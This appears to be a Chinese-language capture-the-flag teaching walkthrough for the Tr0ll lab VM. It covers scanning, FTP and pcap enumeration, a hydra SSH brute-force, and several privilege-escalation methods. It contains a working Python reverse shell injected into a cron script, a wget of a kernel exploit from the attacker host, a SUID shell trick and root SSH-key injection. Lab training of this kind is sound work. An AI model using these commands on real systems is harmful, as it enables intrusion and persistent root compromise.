Tr0ll 渗透测试项目教学文档<\/h1>

1. 环境准备<\/h2>

攻击机<\/strong>: Kali Linux<\/li>
目标机<\/strong>: Tr0ll (IP: 192.168.111.136)<\/li>

工具<\/strong>: nmap, ftp, wireshark, hydra, gcc, python, ssh, nc<\/li> <\/ul>
2. 信息收集阶段<\/h2>
2.1 网络扫描<\/h3>
nmap -sP 192.168.111.0\/24 # 发现目标IP<\/span> <\/span><\/span>nmap 192.168.111.136 -p- # 全端口扫描<\/span> <\/span><\/span>nmap 192.168.111.136 -p- -sS -sV -A # 详细扫描<\/span> <\/span><\/span><\/code><\/pre>扫描结果:<\/p> FTP (允许匿名登录)<\/li> SSH (OpenSSH 6.6.1p1 Ubuntu)<\/li> HTTP (Apache 2.4.7)<\/li> <\/ul> 2.2 FTP枚举<\/h3> ftp 192.168.111.136 <\/span><\/span># 用户名: Anonymous<\/span> <\/span><\/span># 密码: Anonymous<\/span> <\/span><\/span><\/code><\/pre>发现文件: lol.pcap<\/code> (流量文件)<\/p> 2.3 Wireshark分析<\/h3> 分析lol.pcap<\/code>文件:<\/p> 右键 -> 追踪流量 -> TCP流量<\/li> 在tcp.stream eq 2中发现提示: Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P <\/code><\/pre> <\/li> <\/ol> 2.4 Web目录枚举<\/h3> 访问:<\/p> http:\/\/192.168.111.136\/robots.txt<\/code> 发现\/secret<\/code>目录<\/li> http:\/\/192.168.111.136\/sup3rs3cr3tdirlol\/<\/code> 下载roflmao<\/code>文件<\/li> <\/ul> 分析roflmao<\/code>文件:<\/p> file roflmao # 32位ELF二进制文件<\/span> <\/span><\/span>strings roflmao # 发现提示: Find address 0x0856BF to proceed<\/span> <\/span><\/span><\/code><\/pre>访问http:\/\/192.168.111.136\/0x0856BF\/<\/code>发现两个子目录:<\/p> good_luck\/which_one_lol.txt<\/code><\/li> this_folder_contains_the_password\/Pass.txt<\/code><\/li> <\/ul> 3. 渗透阶段<\/h2> 3.1 SSH爆破<\/h3> 使用hydra<\/code>进行爆破:<\/p> hydra -L yaoguang2.txt -p Pass.txt 192.168.111.136 ssh <\/span><\/span><\/code><\/pre>获得凭据:<\/p> 用户名: overflow<\/li> 密码: Pass.txt<\/li> <\/ul> 3.2 获取初始shell<\/h3> ssh overflow@192.168.111.136 <\/span><\/span># 提升shell交互性<\/span> <\/span><\/span>python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre>4. 提权阶段<\/h2> 4.1 系统信息收集<\/h3> id <\/span><\/span>uname -a # 显示内核版本: Linux 3.13.0<\/span> <\/span><\/span><\/code><\/pre>4.2 内核提权方法<\/h3> 方法1: overlayfs漏洞利用<\/h4> 查找可用exp:<\/li> <\/ol> searchsploit linux ubuntu 3.13.0 <\/span><\/span><\/code><\/pre> 使用37292.c:<\/li> <\/ol> wget http:\/\/192.168.111.128:8081\/37292.c <\/span><\/span>gcc 37292.c -o dayu1 <\/span><\/span>.\/dayu1 <\/span><\/span><\/code><\/pre>方法2: 利用计划任务反弹shell<\/h4> 发现系统每5分钟会终止SSH进程<\/li> 查找计划任务相关文件:<\/li> <\/ol> find \/ -name cronlog 2>\/dev\/null <\/span><\/span>find \/ -name cleaner.py 2>\/dev\/null <\/span><\/span>find \/ -writable 2>\/dev\/null <\/span><\/span><\/code><\/pre> 修改\/lib\/log\/cleaner.py<\/code>添加反弹shell代码:<\/li> <\/ol> def<\/span> con<\/span>(): <\/span><\/span> import<\/span> socket,<\/span> time,<\/span>pty,<\/span> os <\/span><\/span> host=<\/span>'攻击机IP'<\/span> <\/span><\/span> port=<\/span>9999<\/span> <\/span><\/span> s=<\/span>socket.<\/span>socket(socket.<\/span>AF_INET,socket.<\/span>SOCK_STREAM) <\/span><\/span> s.<\/span>settimeout(10<\/span>) <\/span><\/span> s.<\/span>connect((host,port)) <\/span><\/span> os.<\/span>dup2(s.<\/span>fileno(),0<\/span>) <\/span><\/span> os.<\/span>dup2(s.<\/span>fileno(),1<\/span>) <\/span><\/span> os.<\/span>dup2(s.<\/span>fileno(),2<\/span>) <\/span><\/span> os.<\/span>putenv("HISTFILE"<\/span>,'\/dev\/null'<\/span>) <\/span><\/span> pty.<\/span>spawn("\/bin\/bash"<\/span>) <\/span><\/span> s.<\/span>close() <\/span><\/span>con() <\/span><\/span><\/code><\/pre> 攻击机监听:<\/li> <\/ol> nc -tvlp 9999<\/span> <\/span><\/span><\/code><\/pre>方法3: 创建SUID shell<\/h4> 修改\/lib\/log\/cleaner.py<\/code>:<\/p> os.<\/span>system('cp \/bin\/sh \/tmp\/dayu1'<\/span>) <\/span><\/span>os.<\/span>system('chmod u+s \/tmp\/dayu1'<\/span>) <\/span><\/span><\/code><\/pre>然后执行:<\/p> cd \/tmp <\/span><\/span>.\/dayu1 <\/span><\/span><\/code><\/pre>方法4: SSH密钥提权<\/h4> 生成SSH密钥:<\/li> <\/ol> ssh-keygen <\/span><\/span>cat ~\/.ssh\/id_rsa.pub <\/span><\/span><\/code><\/pre> 修改\/lib\/log\/cleaner.py<\/code>:<\/li> <\/ol> os.<\/span>system('mkdir \/root\/.ssh; chmod 775 .ssh; echo "公钥内容" >> \/root\/.ssh\/authorized_keys'<\/span>) <\/span><\/span><\/code><\/pre> 等待计划任务执行后直接SSH root登录<\/li> <\/ol> 5. 获取flag<\/h2> cd \/root <\/span><\/span>cat proof.txt <\/span><\/span># flag: 702a8c18d29c6f3ca0d99ef5712bfbdc<\/span> <\/span><\/span><\/code><\/pre>6. 总结<\/h2> 本渗透测试涉及:<\/p> 信息收集(nmap, FTP, Wireshark)<\/li> Web目录枚举<\/li> SSH爆破<\/li> 多种提权方法(内核漏洞、计划任务利用、SUID、SSH密钥)<\/li> 最终获取root权限和flag<\/li> <\/ol> 关键点:<\/p> 仔细分析所有发现的信息和提示<\/li> 利用系统定时任务进行权限维持<\/li> 多种提权方法确保成功率<\/li> 注意系统自动终止SSH的特性<\/li> <\/ul>